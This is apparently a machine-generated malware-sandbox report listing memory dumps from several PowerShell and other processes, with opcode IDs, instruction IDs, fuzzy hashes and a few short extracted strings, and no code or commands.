                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd347a0000_dLRcE11Dkl.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 76fde47e6c3be31679e755bbd9167039a7e5ee2ea745e0bc00ba74bedfa1f4cf
                                                                          • Instruction ID: c57f1f5199275823c9bad84e31dbc93f04c6cf48ec2c14e3704cd2c486505ccc
                                                                          • Opcode Fuzzy Hash: 76fde47e6c3be31679e755bbd9167039a7e5ee2ea745e0bc00ba74bedfa1f4cf
                                                                          • Instruction Fuzzy Hash: 0011CEB1D057498FEB44CFA8C4992EDBBB1FF58320F11412AD544E7392DB79A9468B80
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2133239094.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd347a0000_dLRcE11Dkl.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 456ef291cce19e2caf13b2c139915950066af676fe94f465f3c45939cdaaa31e
                                                                          • Instruction ID: 4bb8482404c53d97374cfa63eee14fe2a83015e07067b6d4ff750401abd727fc
                                                                          • Opcode Fuzzy Hash: 456ef291cce19e2caf13b2c139915950066af676fe94f465f3c45939cdaaa31e
                                                                          • Instruction Fuzzy Hash: E001F93071D68A8FD794EB7894A15A973D1FF8D210B100579C649C3382DE2CB88297C1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2133239094.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd347a0000_dLRcE11Dkl.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aefb5c7f704dc4b148cae2f1f381604205a668762794ef17855855a65acce68c
                                                                          • Instruction ID: be009adfd98e2f46a74581c801e766ff0a6d1361010c95be9479e07acd39373c
                                                                          • Opcode Fuzzy Hash: aefb5c7f704dc4b148cae2f1f381604205a668762794ef17855855a65acce68c
                                                                          • Instruction Fuzzy Hash: F0F02830B1D59A8BD7A4BB7C94A15BA73C5EF8D304B100935D60EC3381CD2CB84197C0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2133239094.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd347a0000_dLRcE11Dkl.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 834c42c6bbed6e0228aeafb1f726956798122f1318f167e17532253a6542c684
                                                                          • Instruction ID: bb2ab91635793ef2596a58743305681869235aa4b115e53e1bb8861831041aa5
                                                                          • Opcode Fuzzy Hash: 834c42c6bbed6e0228aeafb1f726956798122f1318f167e17532253a6542c684
                                                                          • Instruction Fuzzy Hash: EBF0F43071D95A8BD794BB3C94A167A73D1EB8D300B500939D50EC3380DE2CB84297C1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2133239094.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd347a0000_dLRcE11Dkl.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7c381fed9d620d1140212ab6bffff51d38da8edd2e4d0c00bc1627235c312309
                                                                          • Instruction ID: c8edc9aeb064f42f25db8968498196943f3909cb829101f5ec3cd6e3d8b0dd8c
                                                                          • Opcode Fuzzy Hash: 7c381fed9d620d1140212ab6bffff51d38da8edd2e4d0c00bc1627235c312309
                                                                          • Instruction Fuzzy Hash: BCE08642B1994D4BEB9479AC28A62F8B3C6DB99310F410535E10DC2387DC1D6C825281
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2134330419.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffd34770000_All function.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: H
                                                                          • API String ID: 0-2852464175
                                                                          • Opcode ID: 6a06bde783d8693347ae809a49c3d8afd4a657417926d770ee9b30de54df9fef
                                                                          • Instruction ID: fd4990d4b462f7c10fa904fc3b1009496e40bcb21ae05b81d725059ae6a1a270
                                                                          • Opcode Fuzzy Hash: 6a06bde783d8693347ae809a49c3d8afd4a657417926d770ee9b30de54df9fef
                                                                          • Instruction Fuzzy Hash: 5D319AA284E3C25FC7435B705CB64A17FB09E4722074E84DBD4C4CB4E3D54C699AD762
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2134330419.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffd34770000_All function.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8d3710be856ad4e11d015d93e35ad2ceb42097f6e358cd5b8289cc3ac1ade128
                                                                          • Instruction ID: 5fbb9ad104d28a9d5a6923a9acc7ec281e15d5fca94a4f4ead0b3c3e27a4ed03
                                                                          • Opcode Fuzzy Hash: 8d3710be856ad4e11d015d93e35ad2ceb42097f6e358cd5b8289cc3ac1ade128
                                                                          • Instruction Fuzzy Hash: 4D31EB61B0DA894FE795E7688C692B87BE1EF96305F4500BBD44DC32D3DD58AC05C351
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2134330419.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffd34770000_All function.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: da56ba5f3312977bccf4354824f88eec9841f44900e3a205d3f466368bae4730
                                                                          • Instruction ID: d4784fb23f1f122b4592e07a051462e0e522ae264ff2305ba6c06b857254f714
                                                                          • Opcode Fuzzy Hash: da56ba5f3312977bccf4354824f88eec9841f44900e3a205d3f466368bae4730
                                                                          • Instruction Fuzzy Hash: 1E718170A199498FEB98EB68C8A8BAD7BE2FF55314F504179D01AD32D1CF78AC41D740
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2570274190.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34760000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: O_^4$O_^7$O_^F$O_^J
                                                                          • API String ID: 0-875994666
                                                                          • Opcode ID: 2e885493dd975bc32d340c5768cef525a19cc6b18a019490f26335b263fa7f1c
                                                                          • Instruction ID: 7c7316b1a101c5f5dd5a0d207d5e788d8146766051ad64cc11732bb99fd3bf2d
                                                                          • Opcode Fuzzy Hash: 2e885493dd975bc32d340c5768cef525a19cc6b18a019490f26335b263fa7f1c
                                                                          • Instruction Fuzzy Hash: 262126FB718826AFD3117BBDB8155EE3744CFD623A34502B2D19E9F243E914709A8AD0
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2617146239.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd347a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dd470a3995d4fb299f7d10febb65859770713eece3a0aa0df3d30694e144b3d4
                                                                          • Instruction ID: 4c0feed17aba1824c3f0dad16fd47ffce92c8dff76f64a5604d31c2e20b2bedf
                                                                          • Opcode Fuzzy Hash: dd470a3995d4fb299f7d10febb65859770713eece3a0aa0df3d30694e144b3d4
                                                                          • Instruction Fuzzy Hash: DDD18070A18A4D8FDF94DF58C4A5AA977F1FF69300F14416AD449D72A6CA38F881CBC1
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2613179447.00007FFD3468D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3468D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd3468d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3fc965c1e5b55aefa61283f82d31b524b7412c011f76bc01205b95dbeccabae1
                                                                          • Instruction ID: ae96de83d47391901b54d1085105472e2b8b758800658767e45cae8d64f96b5b
                                                                          • Opcode Fuzzy Hash: 3fc965c1e5b55aefa61283f82d31b524b7412c011f76bc01205b95dbeccabae1
                                                                          • Instruction Fuzzy Hash: 0941F57180DBC44FE7969B28D8959923FF0EF57320B1905DFD488CB1A3D629A84AC793
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2617146239.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd347a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1382dd9d7f37789dd679ea548ca36e8fdb063b499b80f061b4dac3400356ad09
                                                                          • Instruction ID: 78740e07156033ff32ed8c3ec7138d1c8454b7ebd80c5bf9c2f4a7dd3151bf8c
                                                                          • Opcode Fuzzy Hash: 1382dd9d7f37789dd679ea548ca36e8fdb063b499b80f061b4dac3400356ad09
                                                                          • Instruction Fuzzy Hash: F931A431A1CB4C9FDB1CDB5CA84A6A9BBE0FB99711F00422FE449D3251CB70A855CBC2
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2617146239.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd347a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fea041103a57bc3e2c4a69a69166bfd142e25a83ed93bcd1ce9815bd5f4a6b07
                                                                          • Instruction ID: 35a2aa821d22b4f32a861be7d46d7058b6517f91547102707e294ecc25ae8385
                                                                          • Opcode Fuzzy Hash: fea041103a57bc3e2c4a69a69166bfd142e25a83ed93bcd1ce9815bd5f4a6b07
                                                                          • Instruction Fuzzy Hash: D121093190C78C4FDB59DBAC9C4A6E97FE0EB56321F04416BD048C3152D674A81AC791
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2620058435.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd34870000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3dbdabca2f69e81aafe9d2829a3174e00833981f861073ac855503f6390bee84
                                                                          • Instruction ID: c0fa3a2db94a78435be43aa47d769539a4f80437ffdbf569700352de81a5260e
                                                                          • Opcode Fuzzy Hash: 3dbdabca2f69e81aafe9d2829a3174e00833981f861073ac855503f6390bee84
                                                                          • Instruction Fuzzy Hash: 6A110632B0D6894FEB91DF9894F41A87BD1EF5A220B0441BEC54DE7193CA3DA845E350
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2617146239.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd347a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                          • Instruction ID: 0a84c860f013be5360dc54d427524c8b7572197af3ada10ad28df495537e80d8
                                                                          • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                          • Instruction Fuzzy Hash: 2501677121CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E882CB45
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2620058435.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd34870000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a696b47bde92ef0e00d6b383c8105af4f860c883da688ccc937b22cbf0ef8d72
                                                                          • Instruction ID: 80d6aa4646295b5ca92b6a66cad14aaa423f26a701a8e64617c627c10a343965
                                                                          • Opcode Fuzzy Hash: a696b47bde92ef0e00d6b383c8105af4f860c883da688ccc937b22cbf0ef8d72
                                                                          • Instruction Fuzzy Hash: EFF09A32B0C9448FD7A8EB4CE8A04A877E1EF5636071140BAE29DC7563CA29EC40C790
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2620058435.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd34870000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5596708de90ac53f609d067ff1fd46c7a8521a6c96b6e2cba420e57f94e846bf
                                                                          • Instruction ID: 101a74af18f6d41723a9f39376eb31d162845993d8be3272c9726b50ef916865
                                                                          • Opcode Fuzzy Hash: 5596708de90ac53f609d067ff1fd46c7a8521a6c96b6e2cba420e57f94e846bf
                                                                          • Instruction Fuzzy Hash: F0F0BE32A4D5448FD794EB4CE8A04A877E0FF0672474140B6E29DDB563DA29AC40D790
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2620058435.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd34870000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                          • Instruction ID: bd9a4ed723fb6972c27f1df6bfa7c04d82bb614e94ade7679d558c9943ce9f6d
                                                                          • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                          • Instruction Fuzzy Hash: 72E04F31B0C8188FDA68EB0CE4A09E977E5EF9937171141B7D28EC7561CA36EC51EB90
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2617146239.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd347a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: K_^4$K_^7$K_^F$K_^J
                                                                          • API String ID: 0-377281160
                                                                          • Opcode ID: 1337c1854dd59eb83ea9a8eb30e63dcf3290b25af5210be026440cbc330f0a7a
                                                                          • Instruction ID: a9df2db955e23b3f35e66654de59260e4ad61196ecaeb889a9e2e5a958b0a231
                                                                          • Opcode Fuzzy Hash: 1337c1854dd59eb83ea9a8eb30e63dcf3290b25af5210be026440cbc330f0a7a
                                                                          • Instruction Fuzzy Hash: 292135F77089266FD7127BBCB8555EE3BA4CF9927834502B3D198DB013E914B09B8AC0
                                                                          Memory Dump Source
                                                                          • Source File: 0000000C.00000002.2372767588.00007FFD3467D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3467D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_12_2_7ffd3467d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 534390dc9b8e64d26bd0cdcee45483cdfacb22c65ad74cfbed81522340573105
                                                                          • Instruction ID: cf695cdd91c70c7d53ec555392de8758405e7422ed5dd6954b6055dd0ff8944c
                                                                          • Opcode Fuzzy Hash: 534390dc9b8e64d26bd0cdcee45483cdfacb22c65ad74cfbed81522340573105
                                                                          • Instruction Fuzzy Hash: D841047040DBC44FE7569F28DC959963FF0EF57220B1946DFD088CB1A3D629A84AC7A2
                                                                          Memory Dump Source
                                                                          • Source File: 0000000C.00000002.2374397177.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_12_2_7ffd34790000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a6011aa679100adccb18649eab08ddb22c28bed60ac5f9a6735cf8e83c858a72
                                                                          • Instruction ID: 5a43b3f83457cbdb8947b4e45eceecf6e97260d24d96343ff8fa6a6829231e84
                                                                          • Opcode Fuzzy Hash: a6011aa679100adccb18649eab08ddb22c28bed60ac5f9a6735cf8e83c858a72
                                                                          • Instruction Fuzzy Hash: 6631737091CB4C9FDB58DB5CE84A6A97BE0FB99711F00422FE449D3251CB71A8558BC2
                                                                          Memory Dump Source
                                                                          • Source File: 0000000C.00000002.2374397177.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_12_2_7ffd34790000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6d2b51f6f23ce4e00ef449c3f86674d4bb5771062c8572e4a42eee5a4725ba2c
                                                                          • Instruction ID: 6ab17142f9f8fb3938c2552b7adaa1da4837da3387f64e83a3352db6bc4add7b
                                                                          • Opcode Fuzzy Hash: 6d2b51f6f23ce4e00ef449c3f86674d4bb5771062c8572e4a42eee5a4725ba2c
                                                                          • Instruction Fuzzy Hash: 8821E67090CB4C8FDB59DBA8984A6E97FE0EB56321F04426BD049C3152DA74A816CBA2
                                                                          Memory Dump Source
                                                                          • Source File: 0000000C.00000002.2376425796.00007FFD34860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34860000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_12_2_7ffd34860000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6e1e59b40c16b804b51e6146eb3277c1ba8df682b07486494f754fe059b3ac8c
                                                                          • Instruction ID: 98fad953d66dabd0d1d37db0c188a9db8b82f0f86909cd687e316019b52a038d
                                                                          • Opcode Fuzzy Hash: 6e1e59b40c16b804b51e6146eb3277c1ba8df682b07486494f754fe059b3ac8c
                                                                          • Instruction Fuzzy Hash: 9C110632B0DAC94FEB91DFA890E45A877D1EF5A220B4441BEC64DE7193CE2DA845D350
                                                                          Memory Dump Source
                                                                          • Source File: 0000000C.00000002.2374397177.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_12_2_7ffd34790000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                          • Instruction ID: 7f35bd5044578bf9c0f8abe52516a2319000a2064556ee323e06116b507f2bf6
                                                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                          • Instruction Fuzzy Hash: 6701677125CB0C8FD744EF0CE451AA5B7E0FB99364F10056DE58AC3651DA36E882CB45
                                                                          Memory Dump Source
                                                                          • Source File: 0000000C.00000002.2376425796.00007FFD34860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34860000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_12_2_7ffd34860000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5ccd98f4549170330db1c2c99e8cbdb248738b512efa01cb972bd844a0efe490
                                                                          • Instruction ID: d035231d26e64e3ab9f909a87b334af7f4265c8666c58b787efe53bc43a1c3f1
                                                                          • Opcode Fuzzy Hash: 5ccd98f4549170330db1c2c99e8cbdb248738b512efa01cb972bd844a0efe490
                                                                          • Instruction Fuzzy Hash: 57F0BE32B0C9448FD7A9EB4CE4904E873E1EF5633075100BAE25DCB563CA29EC40CB84
                                                                          Memory Dump Source
                                                                          • Source File: 0000000C.00000002.2376425796.00007FFD34860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34860000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_12_2_7ffd34860000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2f391cd3648521b286ff4fd1151afa543891bc47b5e6405cbba18cf5154ec560
                                                                          • Instruction ID: 24bbbc643bf75c45909b9eff55c67ac5cbcf50787e5ce65c8fd4ae2c5d007a82
                                                                          • Opcode Fuzzy Hash: 2f391cd3648521b286ff4fd1151afa543891bc47b5e6405cbba18cf5154ec560
                                                                          • Instruction Fuzzy Hash: A2F0BE32A0D5448FD795EB4CE0914E873E0FF06724B8100B6E24DCB563DA2AAC40C790
                                                                          Memory Dump Source
                                                                          • Source File: 0000000C.00000002.2376425796.00007FFD34860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34860000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_12_2_7ffd34860000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                          • Instruction ID: ee9586f07496c1bd1986fd336a253b726326e321646279f7fa3f18427cd421a5
                                                                          • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                          • Instruction Fuzzy Hash: 56E01A31B0C8188FDAA8DB0CE0909ED73E1EB9933175101B7D24EC7561CA2AEC519B84
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000C.00000002.2374397177.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_12_2_7ffd34790000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L_^$L_^$L_^$L_^
                                                                          • API String ID: 0-2357752022
                                                                          • Opcode ID: f30e54de0ffa842bdc6bf3dab58cd4b347e72fb9659f61730a2b9c74b80a6a10
                                                                          • Instruction ID: cf782fa72f43ac41a017fe7313ae504fcc83cc30c869c7516089a9f9cd6657c4
                                                                          • Opcode Fuzzy Hash: f30e54de0ffa842bdc6bf3dab58cd4b347e72fb9659f61730a2b9c74b80a6a10
                                                                          • Instruction Fuzzy Hash: BD4169E3A1D6C25FE36646295CB60D97F95EF53324B0E11F7C285CB093EE1D280B9292
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000C.00000002.2374397177.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_12_2_7ffd34790000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L_^4$L_^7$L_^F$L_^J
                                                                          • API String ID: 0-3225005683
                                                                          • Opcode ID: 8102688ab214c8cdd39813c713289ae0ebbb44b5a4c555a5b4d77903fd85f6ad
                                                                          • Instruction ID: 443b2aa078ec86e58260c0e43e9e1caa0695d1715e2cf29a0d7621581b0329fa
                                                                          • Opcode Fuzzy Hash: 8102688ab214c8cdd39813c713289ae0ebbb44b5a4c555a5b4d77903fd85f6ad
                                                                          • Instruction Fuzzy Hash: F92123B77088266FD3127BFDB8165FE3744CF9523834552B2D2989B003EA14709A8AE0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2977501725.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd34780000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ^R_L
                                                                          • API String ID: 0-669454707
                                                                          • Opcode ID: 2693991f226b519d4ff39fa5eb670bf771986e025d6f0cfc001514e8bb60ce9f
                                                                          • Instruction ID: 1dc7eaf10f3edc46e5c2c1e26168b52458f95f981c6111c08c5cec2c42c89745
                                                                          • Opcode Fuzzy Hash: 2693991f226b519d4ff39fa5eb670bf771986e025d6f0cfc001514e8bb60ce9f
                                                                          • Instruction Fuzzy Hash: 9B515C7160CB888FD798DB6C9886AB57BE0EB97321F14016EE1DAC3157D929F407C781
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2977501725.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd34780000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 15c7e51d964a2b68a726e3c63e073fb307c5c526a3900ed6ac0cb6933ca91310
                                                                          • Instruction ID: 9cbae5333452c06c2287ebeda900931c07a89cdd8c5ca71041eb1d1e3467930f
                                                                          • Opcode Fuzzy Hash: 15c7e51d964a2b68a726e3c63e073fb307c5c526a3900ed6ac0cb6933ca91310
                                                                          • Instruction Fuzzy Hash: E8117072A0D7C98FDB579B3898765A53FB0AF17205B0905E7D489CB0B3DA1C680CD792
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2977501725.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd34780000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 86da5456a26961afb466c61509dd3e6b2a7bbbd5be122986c59b313bff5aaaff
                                                                          • Instruction ID: 5a885ef8ad6a8fa8a33e0fa19d8d78fb609e953197dc377a3092eeeb8bdc725d
                                                                          • Opcode Fuzzy Hash: 86da5456a26961afb466c61509dd3e6b2a7bbbd5be122986c59b313bff5aaaff
                                                                          • Instruction Fuzzy Hash: 22716E7061CB488FE799DF28C49AAB57BE1EF56311F1001BED19AC71A3CA25A446C781
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2972625263.00007FFD3466D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3466D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd3466d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 98246c8f90153602c9fb4b58837917f66936c79d604aa535f53306967bbc5cc3
                                                                          • Instruction ID: ad9aa791d6d02df35ddf7f36eb8f9e2d8ab7b157be920b1fa3b6c97a23758135
                                                                          • Opcode Fuzzy Hash: 98246c8f90153602c9fb4b58837917f66936c79d604aa535f53306967bbc5cc3
                                                                          • Instruction Fuzzy Hash: D541067180DBC44FD7568B38D8959923FF0EF57220B1906DFD088CB1A3D629A84AC792
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2977501725.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd34780000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1fc86bee9b3a7f7a3ad406998a7c7a9676feb15329b44b27db76bbf3a7d694e3
                                                                          • Instruction ID: ca688321c6ef65642752a6882354ed5f62f539515d6e756f43e65727347f037a
